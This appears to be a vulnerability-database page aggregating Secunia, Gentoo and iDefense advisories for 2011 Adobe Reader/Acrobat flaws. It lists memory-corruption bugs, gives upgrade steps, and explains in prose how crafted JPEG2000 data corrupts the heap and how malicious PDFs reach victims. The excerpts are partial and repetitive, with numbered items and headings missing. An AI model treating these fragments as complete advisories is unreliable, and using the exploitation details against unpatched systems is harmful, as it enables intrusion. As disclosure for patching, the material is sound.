VARIoT IoT vulnerabilities database
| VAR-201102-0021 | CVE-2011-0565 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. This vulnerability CVE-2011-0585 Is a different vulnerability.An attacker could execute arbitrary code. Adobe Acrobat and Reader are prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to cause the affected application to crash.
Adobe Reader and Acrobat versions prior to 9.4.2 and 10.0.1 are affected.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: Normal
Title: Adobe Reader: Multiple vulnerabilities
Date: January 30, 2012
Bugs: #354211, #382969, #393481
ID: 201201-19
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities in Adobe Reader might allow remote attackers
to execute arbitrary code or conduct various other attacks.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could entice a user to open a specially crafted PDF
file using Adobe Reader, possibly resulting in the remote execution of
arbitrary code, a Denial of Service, or other impact.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2012 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201102-0061 | CVE-2011-0602 | Adobe Reader and Acrobat Vulnerable to arbitrary code execution |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. Adobe Reader and Acrobat Contains a vulnerability that allows arbitrary code execution. This vulnerability CVE-2011-0596 , CVE-2011-0598 and CVE-2011-0599 Is a different vulnerability.A third party may execute arbitrary code through the image.
For more information:
SA43207
SOLUTION:
Updated packages are available via Red Hat Network. BACKGROUND
Adobe Reader/Acrobat is a Portable Document Format Viewer (PDF). For
more information, see the vendor's site found at the following link.
http://www.adobe.com/products/reader/
II.
JPEG2000 (JP2K) is an image file format similar to JPEG. In addition to
JPEG markers, JP2K files also provide "boxes" that define different
image properties. Several different JP2K record types are involved in the
vulnerability. It is possible to increment a buffer index beyond the
allocated data, and store pointers to file data at that location. This
can result in the corruption of heap structures and application data,
which leads to the execution of arbitrary code.
III. ANALYSIS
Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user viewing the web page or opening the
file. Since PDF files can be embedded into web pages and parsed without
interaction by default, this vulnerability can be exploited as a
typical browser vulnerability. To exploit this vulnerability, a
targeted user must load a malicious webpage created by an attacker. An
attacker typically accomplishes this via social engineering or
injecting content into compromised, trusted sites. After the user
visits the malicious web page, no further user interaction is needed.
IV. A full list of vulnerable
Adobe products can be found in Adobe Security Bulletin APSB11-03.
V. WORKAROUND
Disabling the web view mode of Adobe Reader will prevent exploitation
through the browser.
VI. VENDOR RESPONSE
Adobe has addressed this issue with an update. Further details and
patches can be found at the following URL.
http://www.adobe.com/support/security/bulletins/apsb11-03.html
VII. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
11/17/2010 Initial Vendor Notification
11/17/2010 Initial Vendor Reply
02/08/2011 Coordinated Public Disclosure
IX.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2011 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information. ----------------------------------------------------------------------
Get a tax break on purchases of Secunia Solutions!
If you are a U.S. company, you may be qualified for a tax break for your software purchases. Learn more at:
http://secunia.com/products/corporate/vim/section_179/
----------------------------------------------------------------------
TITLE:
Adobe Reader / Acrobat Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA43207
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/43207/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
RELEASE DATE:
2011-02-09
DISCUSS ADVISORY:
http://secunia.com/advisories/43207/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/43207/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=43207
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in Adobe Reader /
Acrobat, which can be exploited by malicious, local users to gain
escalated privileges and by malicious people to conduct cross-site
scripting attacks and compromise a user's system.
2) An unspecified error can be exploited to corrupt memory.
3) An unspecified error related to file permissions in Windows-based
versions can be exploited to gain escalated privileges.
4) An unspecified error may allow code execution.
5) An unspecified error when parsing images can be exploited to
corrupt memory.
6) An error in AcroRd32.dll when parsing certain images can be
exploited to corrupt memory.
7) An unspecified error in the Macintosh-based versions may allow
code execution.
9) An unspecified error may allow code execution.
10) A input validation error may allow code execution.
11) An input validation error can be exploited to conduct cross-site
scripting attacks.
13) An unspecified error can be exploited to corrupt memory.
14) A boundary error when decoding U3D image data in an IFF file can
be exploited to cause a buffer overflow.
15) A boundary error when decoding U3D image data in a RGBA file can
be exploited to cause a buffer overflow.
16) A boundary error when decoding U3D image data in a BMP file can
be exploited to cause a buffer overflow.
17) A boundary error when decoding U3D image data in a PSD file can
be exploited to cause a buffer overflow.
18) An input validation error when parsing fonts may allow code
execution.
19) A boundary error when decoding U3D image data in a FLI file can
be exploited to cause a buffer overflow.
20) An error in 2d.dll when parsing height and width values of RLE_8
compressed BMP files can be exploited to cause a heap-based buffer
overflow.
21) An integer overflow in ACE.dll when parsing certain ICC data can
be exploited to cause a buffer overflow.
22) A boundary error in rt3d.dll when parsing bits per pixel and
number of colors if 4/8-bit RLE compressed BMP files can be exploited
to cause a heap-based buffer overflow.
23) An error in the U3D implementation when handling the Parent Node
count can be exploited to cause a buffer overflow.
24) A boundary error when processing JPEG files embedded in a PDF
file can be exploited to corrupt heap memory.
25) An unspecified error when parsing images may allow code
execution.
26) An input validation error can be exploited to conduct cross-site
scripting attacks.
27) An unspecified error in the Macintosh-based versions may allow
code execution.
28) A boundary error in rt3d.dll when parsing certain files can be
exploited to cause a stack-based buffer overflow.
29) An integer overflow in the U3D implementation when parsing a ILBM
texture file can be exploited to cause a buffer overflow.
30) Some vulnerabilities are caused due to vulnerabilities in the
bundled version of Adobe Flash Player.
For more information:
SA43267
The vulnerabilities are reported in versions 8.2.5 and prior, 9.4.1
and prior, and 10.0 and prior.
SOLUTION:
Update to version 8.2.6, 9.4.2, or 10.0.1.
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
PROVIDED AND/OR DISCOVERED BY:
2) Bing Liu, Fortinet's FortiGuard Labs.
6) Abdullah Ada via ZDI.
8) Haifei Li, Fortinet's FortiGuard Labs.
14 - 17, 19, 20, 22, 29) Peter Vreugdenhil via ZDI.
21) Sebastian Apelt via ZDI.
23) el via ZDI.
14) Sean Larsson, iDefense Labs.
28) An anonymous person via ZDI.
The vendor also credits:
1) Mitja Kolsek, ACROS Security.
3) Matthew Pun.
4, 5, 18) Tavis Ormandy, Google Security Team.
7) James Quirk.
9) Brett Gervasoni, Sense of Security.
10) Joe Schatz.
11, 26) Billy Rios, Google Security Team.
12) Greg MacManus, iSIGHT Partners Labs and Parvez Anwar.
13) CESG.
25) Will Dormann, CERT.
27) Marc Schoenefeld, Red Hat Security Response Team.
ORIGINAL ADVISORY:
Adobe (APSB11-03)
http://www.adobe.com/support/security/bulletins/apsb11-03.html
http://www.adobe.com/support/security/bulletins/apsb11-02.html
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-11-065/
http://www.zerodayinitiative.com/advisories/ZDI-11-066/
http://www.zerodayinitiative.com/advisories/ZDI-11-067/
http://www.zerodayinitiative.com/advisories/ZDI-11-068/
http://www.zerodayinitiative.com/advisories/ZDI-11-069/
http://www.zerodayinitiative.com/advisories/ZDI-11-070/
http://www.zerodayinitiative.com/advisories/ZDI-11-071/
http://www.zerodayinitiative.com/advisories/ZDI-11-072/
http://www.zerodayinitiative.com/advisories/ZDI-11-073/
http://www.zerodayinitiative.com/advisories/ZDI-11-074/
http://www.zerodayinitiative.com/advisories/ZDI-11-075/
http://www.zerodayinitiative.com/advisories/ZDI-11-077/
FortiGuard Labs:
http://www.fortiguard.com/advisory/FGA-2011-06.html
iDefense:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=891
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
Affected packages
=================
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 app-text/acroread < 9.4.7 >= 9.4.7=20
Description
===========
Multiple vulnerabilities have been discovered in Adobe Reader. Please
review the CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Adobe Reader users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/acroread-9.4.7"
References
==========
[ 1 ] CVE-2010-4091
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-4091
[ 2 ] CVE-2011-0562
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0562
[ 3 ] CVE-2011-0563
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0563
[ 4 ] CVE-2011-0565
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0565
[ 5 ] CVE-2011-0566
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0566
[ 6 ] CVE-2011-0567
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0567
[ 7 ] CVE-2011-0570
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0570
[ 8 ] CVE-2011-0585
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0585
[ 9 ] CVE-2011-0586
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0586
[ 10 ] CVE-2011-0587
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0587
[ 11 ] CVE-2011-0588
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0588
[ 12 ] CVE-2011-0589
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0589
[ 13 ] CVE-2011-0590
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0590
[ 14 ] CVE-2011-0591
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0591
[ 15 ] CVE-2011-0592
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0592
[ 16 ] CVE-2011-0593
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0593
[ 17 ] CVE-2011-0594
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0594
[ 18 ] CVE-2011-0595
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0595
[ 19 ] CVE-2011-0596
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0596
[ 20 ] CVE-2011-0598
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0598
[ 21 ] CVE-2011-0599
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0599
[ 22 ] CVE-2011-0600
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0600
[ 23 ] CVE-2011-0602
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0602
[ 24 ] CVE-2011-0603
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0603
[ 25 ] CVE-2011-0604
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0604
[ 26 ] CVE-2011-0605
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0605
[ 27 ] CVE-2011-0606
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0606
[ 28 ] CVE-2011-2130
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2130
[ 29 ] CVE-2011-2134
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2134
[ 30 ] CVE-2011-2135
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2135
[ 31 ] CVE-2011-2136
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2136
[ 32 ] CVE-2011-2137
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2137
[ 33 ] CVE-2011-2138
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2138
[ 34 ] CVE-2011-2139
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2139
[ 35 ] CVE-2011-2140
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2140
[ 36 ] CVE-2011-2414
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2414
[ 37 ] CVE-2011-2415
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2415
[ 38 ] CVE-2011-2416
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2416
[ 39 ] CVE-2011-2417
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2417
[ 40 ] CVE-2011-2424
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2424
[ 41 ] CVE-2011-2425
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2425
[ 42 ] CVE-2011-2431
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2431
[ 43 ] CVE-2011-2432
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2432
[ 44 ] CVE-2011-2433
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2433
[ 45 ] CVE-2011-2434
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2434
[ 46 ] CVE-2011-2435
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2435
[ 47 ] CVE-2011-2436
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2436
[ 48 ] CVE-2011-2437
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2437
[ 49 ] CVE-2011-2438
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2438
[ 50 ] CVE-2011-2439
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2439
[ 51 ] CVE-2011-2440
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2440
[ 52 ] CVE-2011-2441
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2441
[ 53 ] CVE-2011-2442
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2442
[ 54 ] CVE-2011-2462
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2462
[ 55 ] CVE-2011-4369
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4369
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201201-19.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
